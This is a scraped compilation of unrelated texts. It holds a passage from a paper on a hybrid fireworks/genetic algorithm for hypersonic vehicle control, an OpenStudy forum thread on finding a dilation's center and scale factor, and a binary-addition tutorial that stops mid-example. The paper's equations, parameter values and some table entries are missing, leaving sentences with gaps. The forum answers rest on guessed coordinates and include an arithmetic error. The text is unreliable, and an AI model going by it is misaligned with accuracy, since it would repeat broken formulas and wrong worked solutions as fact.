Additionally, GA exhibits potential parallelism, and thus individuals can be compared simultaneously. Therefore, we introduce GA into the mutation process of AFWA to generate more diverse and fitter solutions.\n\n##### 4.2. Hybrid Fireworks Algorithm with the Genetic Operator\n\nIn order to improve the search efficiency, the main idea in the proposed hybrid FWA involves utilizing all individuals (fireworks and sparks) to generate new individuals. In order to generate more diverse and fitter solutions, another idea involves selecting the father and mother from individuals with different features that correspond to “core individuals” and “noncore individuals.” Core individuals include the best firework and the sparks generated by the best firework. They exhibit better fitness values and closer locations. Noncore individuals include the other “bad” fireworks and sparks generated by them. They are more diverse.\n\nThe process of the genetic operator is given as follows:(1)Encoding: encode solutions to become chromosomes (individuals) with discrete units termed as genes.(2)Recombination pool construction: construct recombination pool with qualified individuals.(3)Parent selection: select parents from core individuals and noncore individuals, respectively.(4)Crossover and mutation also exist.\n\nThe process of the genetic operator is illustrated in Figure 6.\n\nThe steps in the genetic operator are stated in detail as follows.\n\n(i) Encoding. The -dimension solutions are encoded to -dimension chromosomes, in which each gene represents the value of corresponding dimension of a solution.\n\n(ii) Recombination Pool Construction. In order to improve the efficiency of crossover and mutation operations, two pools to select father and mother are constructed. The pool for the selection of the father is constructed by the core individuals from two sources, which include all the fathers ( fathers) in the last generation and several core individuals selected in the current generation ( core individuals). It aids in utilizing the information of the fitter individuals in a wider range. Similarly, the pool for the selection of the mother is constructed by all the mothers ( mothers) in the last generation and several noncore individuals selected in the current generation ( noncore individuals).\n\nWith respect to the core individuals that are fitter and located closer, a random selection is applied among them to construct the pool for father selection. Conversely, the noncore individuals are diverse. Therefore, a roulette wheel is employed to select the fitter ones to construct the pool for the selection of the mother.\n\nThe algorithm of constructing the recombination pool is shown in Algorithm 1.\n\n Construct the pool for the father selection as follows: All the fathers of the last generation ( fathers) are reserved in the pool. Randomly select core individuals in the current generation to join the pool. Construct the pool for the mother selection as follows: All the mothers of the last generation ( mothers) are reserved in the pool. Select noncore individuals in the current generation by the roulette wheel to join the pool.\n\n(iii) Parent Selection. The individuals from the current generation are preferred to select the parents with a higher probability of generating diverse and fitter offspring. 
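Parent selection, crossover, and mutation are spelled out in the next paragraphs and in Algorithms 1 and 2; the sketch below previews how the two recombination pools and a generic real-coded crossover/mutation step might fit together. The roulette convention for a minimization problem and the per-gene mutation are assumptions made for illustration, not details taken from the paper.

```python
import random

def roulette_select(individuals, costs, k):
    """Roulette-wheel selection for minimization: lower cost, larger weight."""
    worst = max(costs)
    weights = [worst - c + 1e-12 for c in costs]
    return random.choices(individuals, weights=weights, k=k)

def build_pools(prev_fathers, prev_mothers,
                core, noncore, noncore_costs, n_core, n_noncore):
    """Algorithm 1: the father pool keeps last generation's fathers plus
    randomly chosen core individuals; the mother pool keeps last
    generation's mothers plus roulette-selected noncore individuals."""
    father_pool = list(prev_fathers) + random.sample(core, min(n_core, len(core)))
    mother_pool = list(prev_mothers) + roulette_select(noncore, noncore_costs,
                                                       k=n_noncore)
    return father_pool, mother_pool

def crossover_and_mutate(father, mother, lower, upper, p_c, p_m):
    """Single-point crossover with probability p_c, then reset each gene
    with probability p_m to a random value inside the search space."""
    child1, child2 = list(father), list(mother)
    if len(father) > 1 and random.random() < p_c:
        point = random.randrange(1, len(father))
        child1[point:], child2[point:] = mother[point:], father[point:]
    for child in (child1, child2):
        for k in range(len(child)):
            if random.random() < p_m:
                child[k] = random.uniform(lower[k], upper[k])
    return child1, child2
```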
In order to select fathers from pool, the fathers of the last generation are replaced by other individuals that have better fitness, and the remaining fathers of the last generation may be replaced by other individuals again with a probability of (). Mothers are selected in the same way as the fathers.\n\nThe algorithm of selecting parents is shown in Algorithm 2.\n\n Select fathers from the pool as follows: Replace the last generation’s fathers by other individuals in pool that have better fitness. Replace the remaining last generation’s fathers again with a probability (). Select mothers from pool as follows: Replace the last generation’s mothers by other individuals in pool that have better fitness. Replace the remaining last generation’s mothers again with a probability .\n\n(iv) Crossover and Mutation. The selected parents are randomly paired to exchange information to generate new two individuals. In the crossover, the tails of a pair of chromosomes (individuals) are swapped at a random point along the gene sequence with a crossover probability (). After the crossover, the gene in sequence is mutated. This means the offspring are obtained by randomly setting approximately of the dimensions of the individual within the search space, where denotes mutation probability ().\n\nThus, a new hybrid FWA is proposed by introducing the GA into the mutation process of AFWA. The flowchart of the proposed optimization algorithm is shown in Figure 7.\n\nHere and are the upper and the lower bounds of the search space, respectively.\n\n##### 4.3. Hybrid FWA-Based Parameter Optimization\n\nThe proposed hybrid FWA-based parameter optimization method combines the advantages of SRA and the hybrid FWA. By the SRA, the cost function is given to evaluate the HV tracking performance under uncertainties. Subsequently, the hybrid FWA is used to determine the optimal design parameters to satisfy the tracking performance requirements of HV with high probability. The flowchart of the proposed hybrid FWA-based parameter optimization method is given in Figure 8.\n\nTo illustrate the search process of the proposed hybrid FWA-based parameter optimization method in detail, the following steps are given:Generate several solutions by the hybrid FWA search process.(a)Randomly initialize a population of fireworks in the search space.(b)For each firework, generate explosion sparks within the explosion amplitude , and subsequently the positions of the explosion sparks are obtained.(c)Encode all individuals as chromosomes.(d)Select parents from all the chromosomes, and diverse individuals are generated via the genetic operator.Evaluate the solution’s fitness with the cost function in SRA.(a)With the stochastic robustness indices listed in Table 1 and the indicator function as defined in (19), calculate the indicator function value for the corresponding index.(b)By the Monte Carlo simulation, samples under uncertainties are generated to estimate the probability in which the design requirements of HV control are not satisfied.(c)For all the solutions generated in the search process, calculate the cost function in (20).Prepare for the next step searching.(a)After the evaluation of all solution’s fitness, the optimal solution is selected as a firework in the next generation. 
Its adaptive amplitude is calculated based on (28).(b)Randomly select fireworks among all the individuals.Check if the stop criterion is fulfilled.The optimal HOSM parameters are obtained, and an excellent HV tracking performance under uncertainties is achieved.\n\n#### 5. Simulation Study\n\n##### 5.1. Computational Intelligence Algorithm Test Cases\n\nIn this section, typical nonlinear benchmark functions in are employed to test the effectiveness of the proposed hybrid FWA. For the comparison, the GA, PSO, AFWA, and proposed hybrid FWA are run on the benchmarks for 300000 evaluations per function. Each experiment for testing algorithm is repeated 50 times.\n\nIn the testing, the parameters settings of algorithms are listed in Table 2.\n\n Algorithms Algorithm coefficients GA Population size: 200. Binary coded chromosome length: 10. Crossover probability: 0.7. Mutation probability: 0.015. PSO Particle number: 30. Inertia weight: . Learning factor: . AFWA Total sparks number: 200. Other parameters are the same as in . Hybrid FWA Genetic operator parameters: , , , and . Other parameters are the same as AFWA.\n\nThe first function is the Bent Cigar function and is described as follows:where , . The Bent Cigar function is a unimodal function and is smooth. However, it has a narrow ridge. It has the global minimum when , . The second function is the Rosenbrock function that is described as follows:where , . The Rosenbrock function is a nonconvex function in which the global minimum is inside a long, narrow, and parabolic shaped flat valley. It has the global minimum when , . The third function is the Griewank function described as follows:where , . The Griewank function is a multimodal function. It has the global minimum when , . The fourth function is the Alpine function described as follows:where , . The Alpine function is a multimodal function. It has the global minimum when , . The fifth function is the Rastrigin function that is described in where , . The Rastrigin function is a multimodal function, which has huge number of local optima. It has the global minimum when , . The last function is the expanded Schaffer F6 function described in where , . The expanded Schaffer F6 function is a multimodal function. It has the global minimum when , .\n\nThe testing results are given in Table 3.\n\n Function ID Metric GA PSO AFWA Hybrid FWA Mean 63.8216 44.4774 36.6983 Std. 59.7943 40.1607 39.9258 Mean 234.6298 628.8852 58.3773 56.1416 Std. 123.0631 477.8930 31.7385 23.7506 Mean 1.2007 1.7338 0.7527 0.7125 Std. 0.2004 0.5626 0.2188 0.1904 Mean 0.2287 0.6958 0.0708 0.0658 Std. 0.0687 0.4486 0.0259 0.0250 Mean 22.9280 55.2201 19.6178 16.8546 Std. 24.7651 24.7651 15.2610 12.0650 Mean 4.8939 3.7720 3.8627 3.6126 Std. 0.9717 1.2440 1.0428 0.8973\n\nAs shown in Table 3, the proposed hybrid FWA presents the means closest to global minimum. Therefore, the testing results indicate that the hybrid FWA proposed in this study exhibits better search efficiency, when compared to the GA, PSO, and AFWA.\n\n##### 5.2. Algorithm Analysis in Parameter Optimization\n\nIn order to analyze the parameter searching efficiency of algorithms, the GA, PSO, AFWA, and proposed hybrid FWA are used to search for the optimal design parameters of the HOSM controller of HV. In the search, for all the algorithms, the number of individuals is 32, and the number of iterations is 15. For the AFWA, the number of fireworks is 5, the total number of sparks is 32, and the number of mutation sparks is 4. 
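As a brief aside on the benchmark study of Section 5.1, the six test functions can be written in their common textbook forms as below; competition variants typically add shifts and rotations, which are omitted here, so treat these as reference definitions rather than the exact functions used in the experiments.

```python
import math

def bent_cigar(x):
    return x[0] ** 2 + 1e6 * sum(v ** 2 for v in x[1:])

def rosenbrock(x):
    return sum(100.0 * (x[i + 1] - x[i] ** 2) ** 2 + (x[i] - 1.0) ** 2
               for i in range(len(x) - 1))

def griewank(x):
    s = sum(v ** 2 for v in x) / 4000.0
    p = math.prod(math.cos(v / math.sqrt(i + 1)) for i, v in enumerate(x))
    return s - p + 1.0

def alpine(x):
    return sum(abs(v * math.sin(v) + 0.1 * v) for v in x)

def rastrigin(x):
    return 10.0 * len(x) + sum(v * v - 10.0 * math.cos(2.0 * math.pi * v)
                               for v in x)

def schaffer_f6(u, v):
    r2 = u * u + v * v
    return 0.5 + (math.sin(math.sqrt(r2)) ** 2 - 0.5) / (1.0 + 0.001 * r2) ** 2

def expanded_schaffer_f6(x):
    return sum(schaffer_f6(x[i], x[(i + 1) % len(x)]) for i in range(len(x)))
```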
For the hybrid FWA, the number of fireworks and total sparks is the same as in AFWA, , and . The other parameters of algorithms are set the same as shown in Table 2.\n\nThe ranges of the uncertainties in HV are as follows:\n\nThe search space of the HV controller parameters is given in Table 4.\n\n Controller parameters Bound\n\nAs given in Table 1, the cost function in SRA is a weighted sum of 10 probabilities of the design requirements to guide the search of the HOSM controller parameters. The parameters specified for the indicator function are as follows: , , , , , , , , , , , , , , , and . The duration of interested transient stage is defined by the parameters and .\n\nThe results of the HV performance optimization using various optimization algorithms are shown in Figure 9. The -axis of the figure shows the number of iterations, and the -axis shows the optimal value of the cost function . The comparative result indicates that the proposed hybrid FWA exhibits better global search ability for the optimal HV control parameters than that of the GA, PSO, and AFWA.\n\n##### 5.3. Results of Optimal HOSM Controller Design\n\nWith the proposed hybrid FWA-based parameter optimization method, we shall examine the performance of the optimal HOSM controller in the trajectory tracking of HV. Initially, the cruising flight conditions are as follows: Mach number ,  ft/s,  ft, , and  deg/s. At the cruising flight conditions, the aerodynamic parameters , , , , , and are given as follows:\n\nAfter 15 search iterations by the proposed hybrid FWA-based parameter optimization algorithm, the optimal quasi-continuous HOSM controller parameters are determined as follows: . Using AFWA, the optimal controller parameters are determined as follows: . For comparison purposes, the other two sets of design parameters are given: The quasi-continuous HOSM controller parameters (not optimized) in are as follows: . The HOSM controller parameters determined by the improved PSO in are as follows: , .\n\nIn order to demonstrate the tracking performance of HV under uncertainties, the command tracking trajectories using four sets of controller parameters are given in Figure 10. In the simulation, the reference command is generated to control the HV to climb 800 ft at constant velocity in about 15 s. The parametric uncertainties are set as follows: , , , , , and , which are within the range given in (35).\n\nIn Figure 10, the trajectories of altitude , velocity , angle of attack , and throttle setting are depicted by the solid lines, and the reference command is shown by the dotted line. The simulation results demonstrate that the optimal controller parameters determined by hybrid FWA provide a stable and high-accuracy tracking of the reference command in the presence of uncertainties. The command tracking error of the HV control system using the parameters remains the smallest, when compared to the controller parameters , , and . Besides, a faster dynamic response as well as lower fuel consumption is achieved using the parameters determined by the proposed hybrid FWA.\n\nNext, with randomly generated uncertainties, the command tracking trajectories using four sets of controller parameters are demonstrated in Figure 11. The uncertain parameters are assumed to be uniformly distributed within the bounds given in (35). 
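For concreteness, uniform Monte Carlo draws of the uncertain parameters over their bounds might be generated as in the snippet below; the parameter names and the relative bounds are placeholders, since the actual ranges are those given in (35).

```python
import random

# Placeholder relative bounds; substitute the ranges from (35).
UNCERTAINTY_BOUNDS = {
    "mass": 0.03,
    "reference_area": 0.03,
    "air_density": 0.03,
    "aero_coefficients": 0.10,
}

def sample_uncertainties(bounds=UNCERTAINTY_BOUNDS):
    """One Monte Carlo draw: each uncertain parameter receives a uniformly
    distributed relative deviation within its bound."""
    return {name: random.uniform(-b, b) for name, b in bounds.items()}

draws = [sample_uncertainties() for _ in range(200)]  # 200 samples, as in Figure 5
```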
The results indicate that the optimal controller parameters determined by the proposed hybrid FWA not only guarantee the HV system stability, but also exhibit a better tracking performance under bounded uncertainties.\n\nTherefore, the simulation results demonstrate that the HV controller designed by the proposed hybrid FWA-based parameter optimization method achieves an excellent tracking performance in the presence of uncertainties.\n\n#### 6. Conclusion\n\nIn this study, we propose an improved hybrid FWA-based parameter optimization method for nonlinear HV control under uncertainties. An approach of searching for the optimal design parameters is developed by using two processes. The first process involves modeling the relation between the design parameters and the cost function that evaluates the likelihood of system instability and design requirement violation by using SRA. Subsequently, the cost function is minimized by the improved hybrid FWA to achieve a satisfactory tracking performance for the HV system with uncertainties. The proposed method makes it easier and more efficient to solve the optimization problem of satisfying all the HV design requirements with high probability. When compared with other algorithms, the hybrid FWA exhibits better efficiency in solving the HV parameter optimization problem with respect to uncertainties. Moreover, it is also efficient in solving other complex optimization problems.\n\n#### Conflicts of Interest\n\nThe authors declare that there are no conflicts of interest regarding the publication of this paper.\n\n#### Acknowledgments\n\nThis work was supported in part by the National Nature Science Foundation of China (Grant nos. 61573161 and 61473124).\n\n1. B. Xu, D. Wang, Y. Zhang, and Z. Shi, “DOB based neural control of flexible hypersonic flight vehicle considering wind effects,” IEEE Transactions on Industrial Electronics, vol. PP, no. 99, p. 1, 2017. View at: Publisher Site | Google Scholar\n2. Y. Chang, T. Jiang, and Z. Pu, “Adaptive control of hypersonic vehicles based on characteristic models with fuzzy neural network estimators,” Aerospace Science and Technology, vol. 68, pp. 475–485, 2017. View at: Publisher Site | Google Scholar\n3. J. Wang, Y. Wu, and X. Dong, “Recursive terminal sliding mode control for hypersonic flight vehicle with sliding mode disturbance observer,” Nonlinear Dynamics, vol. 81, no. 3, pp. 1489–1510, 2015. View at: Publisher Site | Google Scholar\n4. H. An, C. Wang, and B. Fidan, “Sliding mode disturbance observer-enhanced adaptive control for the air-breathing hypersonic flight vehicle,” Acta Astronautica, vol. 139, pp. 111–121, 2017. View at: Publisher Site | Google Scholar\n5. Y.-J. Wu, J.-X. Zuo, and L.-H. Sun, “Adaptive terminal sliding mode control for hypersonic flight vehicles with strictly lower convex function based nonlinear disturbance observer,” ISA Transactions®, 2017. View at: Publisher Site | Google Scholar\n6. A. Levant, “Quasi-continuous high-order sliding-mode controllers,” Institute of Electrical and Electronics Engineers Transactions on Automatic Control, vol. 50, no. 11, pp. 1812–1816, 2005. View at: Publisher Site | Google Scholar | MathSciNet\n7. M. Sagliano, E. Mooij, and S. Theil, “Adaptive disturbance-based high-order sliding-mode control for hypersonic-entry vehicles,” Journal of Guidance, Control, and Dynamics, vol. 40, no. 3, pp. 521–536, 2017. View at: Publisher Site | Google Scholar\n8. Y. Zhang, R. Li, T. Xue, Z. Liu, and Z. 
Yao, “An analysis of the stability and chattering reduction of high-order sliding mode tracking control for a hypersonic vehicle,” Information Sciences, vol. 348, pp. 25–48, 2016. View at: Publisher Site | Google Scholar | MathSciNet\n9. R. F. Stengel and L. R. Ray, “Stochastic robustness of linear time-invariant control systems,” Institute of Electrical and Electronics Engineers Transactions on Automatic Control, vol. 36, no. 1, pp. 82–87, 1991. View at: Publisher Site | Google Scholar | MathSciNet\n10. Q. Wang and R. F. Stengel, “Robust nonlinear control of a hypersonic aircraft,” Journal of Guidance, Control, and Dynamics, vol. 23, no. 4, pp. 577–585, 2000. View at: Publisher Site | Google Scholar\n11. L. Cao, D. Zhang, S. Tang, and F. Deng, “A practical parameter determination strategy based on improved hybrid PSO algorithm for higher-order sliding mode control of air-breathing hypersonic vehicles,” Aerospace Science and Technology, vol. 59, pp. 1–10, 2016. View at: Publisher Site | Google Scholar\n12. Q. Wang and R. Stengel, “Robust nonlinear control of a hypersonic aircraft,” in Proceedings of the Guidance, Navigation, and Control Conference and Exhibit, American Institute of Aeronautics and Astronautics, Portland, OR, USA, 1999. View at: Publisher Site | Google Scholar\n13. Q. Wang and R. F. Stengel, “Robust nonlinear flight control of a high-performance aircraft,” IEEE Transactions on Control Systems Technology, vol. 13, no. 1, pp. 15–26, 2005. View at: Publisher Site | Google Scholar\n14. A. Azizi, “Introducing a novel hybrid artificial intelligence algorithm to optimize network of industrial applications in modern manufacturing,” Complexity, vol. 2017, Article ID 8728209, 2017. View at: Publisher Site | Google Scholar\n15. Y. Li, Y. Wu, and X. Qu, “Chicken Swarm-Based Method for Ascent Trajectory Optimization of Hypersonic Vehicles,” Journal of Aerospace Engineering, vol. 30, no. 5, Article ID 04017043, 2017. View at: Publisher Site | Google Scholar\n16. D. E. Goldberg, “Genetic algorithms in search, optimization, and machine learning,” Choice Reviews Online, vol. 27, no. 02, pp. 27-0936–27-0936, 1989. View at: Publisher Site | Google Scholar\n17. A. Taieb, M. Soltani, and A. Chaari, “Parameter Optimization of MIMO Fuzzy Optimal Model Predictive Control By APSO,” Complexity, vol. 2017, Article ID 5813192, 11 pages, 2017. View at: Publisher Site | Google Scholar | MathSciNet\n18. Y. Tan and Y. Zhu, “Fireworks algorithm for optimization,” in Advances in Swarm Intelligence: First International Conference, ICSI 2010, Beijing, China, June 12–15, 2010, Proceedings, Part I, vol. 6145 of Lecture Notes in Computer Science, pp. 355–364, Springer, Berlin, Germany, 2010. View at: Publisher Site | Google Scholar\n19. S. Bureerat, “Hybrid population-based incremental learning using real codes in,” in Proceedings of the 5th international conference on Learning and Intelligent Optimization, pp. 379–391, Springer-Verlag, Rome, Italy, 2011. View at: Google Scholar\n20. J. Li, S. Zheng, and Y. Tan, “Adaptive fireworks algorithm,” in Proceedings of the 2014 IEEE Congress on Evolutionary Computation, CEC 2014, pp. 3214–3221, China, July 2014. View at: Publisher Site | Google Scholar\n21. Y.-J. Zheng, X.-L. Xu, H.-F. Ling, and S.-Y. Chen, “A hybrid fireworks optimization method with differential evolution operators,” Neurocomputing, vol. 148, pp. 75–82, 2015. View at: Publisher Site | Google Scholar\n22. B. Zhang, Y.-J. Zheng, M.-X. Zhang, and S.-Y. 
Chen, “Fireworks Algorithm with Enhanced Fireworks Interaction,” IEEE Transactions on Computational Biology and Bioinformatics, vol. 14, no. 1, pp. 42–55, 2017. View at: Publisher Site | Google Scholar\n23. J. Li, S. Zheng, and Y. Tan, “The Effect of Information Utilization: Introducing a Novel Guiding Spark in the Fireworks Algorithm,” IEEE Transactions on Evolutionary Computation, vol. 21, no. 1, pp. 153–166, 2017. View at: Publisher Site | Google Scholar\n24. J. T. Parker, A. Serrani, S. Yurkovich, M. A. Bolender, and D. B. Doman, “Control-oriented modeling of an air-breathing hypersonic vehicle,” Journal of Guidance, Control, and Dynamics, vol. 30, no. 3, pp. 856–869, 2007. View at: Publisher Site | Google Scholar\n25. J. J. Liang, B. Y. Qu, and P. N. Suganthan, Problem definitions and evaluation criteria for the CEC 2014 special session and competition on single objective real-parameter numerical optimization, 2013." ]
https://questioncove.com/updates/4dfa1cca0b8b370c28be3bdc
[ "Mathematics", null, "OpenStudy (anonymous):\n\nMy problem is attached, Thanks!", null, "OpenStudy (anonymous):\n\nHere,", null, "OpenStudy (anonymous):\n\ntwo triangles ABC and abc I think Aa and Bb and Cc lines converge in center of dilation", null, "OpenStudy (anonymous):\n\nratio is ab/AB =ac/AC =bc/BC", null, "OpenStudy (anonymous):\n\nThanks, what does it mean by scale the factor of the dilation?", null, "OpenStudy (anonymous):\n\nA scale factor is a number which scales, or multiplies, some quantity. In the equation y=Cx, C is the scale factor for x. C is also the coefficient of x, and may be called the constant of proportionality of y to x. For example, doubling distances corresponds to a scale factor of 2 for distance, while cutting a cake in half results in pieces with a scale factor of ½.", null, "OpenStudy (anonymous):\n\nokay, and did you find the center?", null, "OpenStudy (anonymous):\n\nlet me see again the diagram plz", null, "OpenStudy (anonymous):\n\nIts at the top.", null, "OpenStudy (anonymous):\n\nplease chek my nums: A(-6,0) ,a(-2,0) B(6,-6) , b(2,-2) Aa: y=0", null, "OpenStudy (anonymous):\n\nBb: m=-1 y+2=-1(x-2) y=-x-4", null, "OpenStudy (anonymous):\n\nthey are correct", null, "OpenStudy (anonymous):\n\n-x-4=0: x=-4 (-4,0) it,s not true!", null, "OpenStudy (anonymous):\n\nis it?", null, "OpenStudy (anonymous):\n\nhhmm... not too sure either", null, "OpenStudy (anonymous):\n\nmy x component is wrong. why?", null, "OpenStudy (anonymous):\n\nI don't know what to tell ya. You were on a roll!", null, "OpenStudy (anonymous):\n\ny=-x-4 is false! y=-x. do you agree?", null, "OpenStudy (anonymous):\n\nso -x=0 x=0 (0,0)", null, "OpenStudy (anonymous):\n\nI can't tell you I agree. This is a problem from way back, and I've forgotten all of the mechanics. I think your on to something though. Or at least I hope... lol", null, "OpenStudy (anonymous):\n\nI hve forgotten too :)", null, "OpenStudy (anonymous):\n\nhaha! Thanks for trying though!", null, "OpenStudy (anonymous):\n\nsorry if i could not help u:)", null, "OpenStudy (anonymous):\n\nNo problem, I'll try re-posting later!", null, "OpenStudy (radar):\n\nThe problem i have is with the drawing. You have to guess the locations as the points are not expressed like (x,y)", null, "OpenStudy (anonymous):\n\nya that sucks", null, "OpenStudy (radar):\n\nlike the two lines that converge on the negative x axis a guess would be -6 but that would be just a guess.", null, "OpenStudy (radar):\n\nThe vertical line that is the base of the large triangle looks to have a segment of the line x=6, but I am not sure.", null, "OpenStudy (anonymous):\n\nI think 6 is the point for both of those.", null, "OpenStudy (radar):\n\nYou would think they would of stated it so, rather than leave a student guessing. The diagram appears to me that the triangles are skewed a little bit so that the x axis does not go through the midpoint of the larger triangles base.", null, "OpenStudy (anonymous):", null, "OpenStudy (radar):\n\nSorry but that is all I can offer! Like you say maybe a reposting and someone like satellite, amister or polpak will see it.", null, "OpenStudy (anonymous):\n\nThanks! I will try that.", null, "OpenStudy (amistre64):\n\nthis one eh?", null, "OpenStudy (anonymous):\n\nyes!!!", null, "OpenStudy (amistre64):\n\ndo we have any option to choose from? 
as in multiple choices?", null, "OpenStudy (anonymous):\n\nSadly no, I have show my work.", null, "OpenStudy (amistre64):\n\nthis is what I assume the points to be", null, "OpenStudy (anonymous):\n\nlooks good", null, "OpenStudy (amistre64):\n\nid have to look up what 'scale dilution' means, but I think its just the scaled factor; find the distances of each line segment", null, "OpenStudy (amistre64):\n\n12 4 --- as --- ; is a scale of 1:3 if i see it right 3 1", null, "OpenStudy (amistre64):\n\nbut the dilution is not centered to the bigger tri, so let me look into that", null, "OpenStudy (amistre64):\n\nscale is either 1:3 or 3:1 that i see, does that make sense? the center of the dilution is the points where the lines cross from angle to midsection ..", null, "OpenStudy (anonymous):\n\nDo you think I would need to park the spot like with the paint tool?", null, "OpenStudy (amistre64):", null, "OpenStudy (amistre64):\n\ndetermine the equations of 2 of those lines; and see where they match up", null, "OpenStudy (amistre64):\n\n(-2,0) (2, -1/2) is one line (2,1) (0,1) appears to be the other", null, "OpenStudy (amistre64):\n\nslope = -1/8 y-0 = -1/8(x-(-2)) y = (-1/8)x - (1/4)", null, "OpenStudy (amistre64):\n\n(2,1) -(0,-1) ------ 2,2 ; slope = y/x = 1 y-1 = x -2 y = x-1 is the other equation", null, "OpenStudy (amistre64):\n\nwhen: x-1 = (-1/8)x - (1/4) we have the center of the diulted triangle right?", null, "OpenStudy (amistre64):\n\nx + (1/8)x = (-1/4) +1 9/8 x = 3/4 x = 8(3)/9(4) = 2(1)/3(1) = 3/2 y = (2/3) -1 = 2/3 - 3/3 = -1/3 the center appears to be at: $(\\frac{3}{2},-\\frac{1}{3})$", null, "OpenStudy (anonymous):\n\nWow. First off my apologies, secondly a huge round of plausible! Thank you so much, I had no idea. One little question before you go: How do you find the area of a circle in pi when your given the entire diameter?", null, "OpenStudy (amistre64):\n\nArea and Circumference have a radius in common; and Radius = half the diameter", null, "OpenStudy (anonymous):\n\napplause*", null, "OpenStudy (amistre64):\n\nArea = pi r^2", null, "OpenStudy (amistre64):\n\nwas my diluted tri correct? :)", null, "OpenStudy (anonymous):\n\nI'm not really sure! But again, so i divide the diameter in half, and then what?", null, "OpenStudy (amistre64):\n\n(d/2)^2 * pi", null, "OpenStudy (amistre64):\n\nif diam = 10; then Area = (10/2)^2 pi = 25 pi", null, "OpenStudy (anonymous):\n\nGot it! thank you so, so, so much!", null, "OpenStudy (radar):\n\nThanks amistre64, I was lost without the points be given.", null, "OpenStudy (amistre64):\n\n:) i had to assume points as well\n\nLatest Questions", null, "Jasonisyours: What's a good book recommendation to read.\n5 minutes ago 2 Replies 1 Medal", null, "miguel008: kendrick\n1 hour ago 9 Replies 0 Medals", null, "23biheil: Use the four functions below for this question: f(x) g(x) h(x) j(x) x f(x) u22121 u22127 1 1 2 5 a line going through the point, negative 2, 5, and 0, negat\n2 hours ago 0 Replies 0 Medals", null, "Jane2711: What do u guys think of my edit (The Bakusquad)\n3 hours ago 3 Replies 0 Medals", null, "iosangel: What figure of speech is being used here. 
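Since the thread never settles on a single answer, the short script below carries the method through: intersect the lines through two pairs of corresponding vertices to get the center, then take the ratio of distances for the scale factor. The coordinates are the guesses quoted earlier in the thread, not values read from the original figure; with amistre64's later point estimates the same procedure gives (2/3, -1/3), since his posted x = 3/2 contains a small arithmetic slip ((3/4)(8/9) = 2/3).

```python
import math
from fractions import Fraction

def line_through(p, q):
    """Line through p and q as coefficients (a, b, c) of a*x + b*y = c."""
    (x1, y1), (x2, y2) = p, q
    a, b = y2 - y1, x1 - x2
    return a, b, a * x1 + b * y1

def intersection(l1, l2):
    """Intersection of two lines in (a, b, c) form, via Cramer's rule."""
    a1, b1, c1 = l1
    a2, b2, c2 = l2
    det = a1 * b2 - a2 * b1
    if det == 0:
        raise ValueError("lines are parallel")
    return Fraction(c1 * b2 - c2 * b1, det), Fraction(a1 * c2 - a2 * c1, det)

# Corresponding vertices guessed in the thread (large triangle -> small one).
A, a = (-6, 0), (-2, 0)
B, b = (6, -6), (2, -2)

cx, cy = intersection(line_through(A, a), line_through(B, b))
print("center of dilation:", (cx, cy))        # (0, 0) with these guesses

center = (float(cx), float(cy))
scale = math.dist(a, center) / math.dist(A, center)
print("scale factor:", scale)                 # 0.333..., i.e. a 1:3 dilation
```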
https://tincantalk.com/Networking_Basics_Binary.html
[ "## Basic Concepts Behind the Binary System\n\nTo understand binary numbers, begin by recalling elementary school math. When we first learned about numbers, we were taught that, in the decimal system, things are organized into columns:\n\n``` H | T | O\n1 | 9 | 3\n```\nsuch that \"H\" is the hundreds column, \"T\" is the tens column, and \"O\" is the ones column. So the number \"193\" is 1-hundreds plus 9-tens plus 3-ones.\n\nYears later, we learned that the ones column meant 10^0, the tens column meant 10^1, the hundreds column 10^2 and so on, such that\n\n``` 10^2|10^1|10^0\n1 | 9 | 3\n```\nthe number 193 is really {(1*10^2)+(9*10^1)+(3*10^0)}.\n\nAs you know, the decimal system uses the digits 0-9 to represent numbers. If we wanted to put a larger number in column 10^n (e.g., 10), we would have to multiply 10*10^n, which would give 10^(n+1), and be carried a column to the left. For example, putting ten in the 10^0 column is impossible, so we put a 1 in the 10^1 column, and a 0 in the 10^0 column, thus using two columns. Twelve would be 12*10^0, or 10^0(10+2), or 10^1+2*10^0, which also uses an additional column to the left (12).\n\nThe binary system works under the exact same principles as the decimal system, only it operates in base 2 rather than base 10. In other words, instead of columns being\n\n```\n10^2|10^1|10^0\n```\nthey are\n``` 2^2|2^1|2^0\n```\n\nInstead of using the digits 0-9, we only use 0-1 (again, if we used anything larger it would be like multiplying 2*2^n and getting 2^n+1, which would not fit in the 2^n column. Therefore, it would shift you one column to the left. For example, \"3\" in binary cannot be put into one column. The first column we fill is the right-most column, which is 2^0, or 1. Since 3>1, we need to use an extra column to the left, and indicate it as \"11\" in binary (1*2^1) + (1*2^0).\n\nRemember:\n``` 2^4| 2^3| 2^2| 2^1| 2^0\n| | | 1 | 0\n| | 1 | 1 | 1\n1 | 0 | 1 | 0 | 1\n1 | 1 | 1 | 1 | 0\n```\n\nConsider the addition of decimal numbers:\n\n``` 23\n+48\n___\n```\n\nWe begin by adding 3+8=11. Since 11 is greater than 10, a one is put into the 10's column (carried), and a 1 is recorded in the one's column of the sum. Next, add {(2+4) +1} (the one is from the carry)=7, which is put in the 10's column of the sum. Thus, the answer is 71.\n\nBinary addition works on the same principle, but the numerals are different. Begin with one-bit binary addition:\n\n``` 0 0 1\n+0 +1 +0\n___ ___ ___\n0 1 1\n```\n\n1+1 carries us into the next column. In decimal form, 1+1=2. In binary, any digit higher than 1 puts us a column to the left (as would 10 in decimal notation). The decimal number \"2\" is written in binary notation as \"10\" (1*2^1)+(0*2^0). Record the 0 in the ones column, and carry the 1 to the twos column to get an answer of \"10.\" In our vertical notation,\n\n``` 1\n+1\n___\n10\n```\n\nThe process is the same for multiple-bit binary numbers:\n\n``` 1010\n+1111\n______\n```\n\n• Step one:\nColumn 2^0: 0+1=1.\nRecord the 1.\nTemporary Result: 1; Carry: 0\n• Step two:\nColumn 2^1: 1+1=10.\nRecord the 0, carry the 1.\nTemporary Result: 01; Carry: 1\n• Step three:\nColumn 2^2: 1+0=1 Add 1 from carry: 1+1=10.\nRecord the 0, carry the 1.\nTemporary Result: 001; Carry: 1\n• Step four:\nColumn 2^3: 1+1=10. 
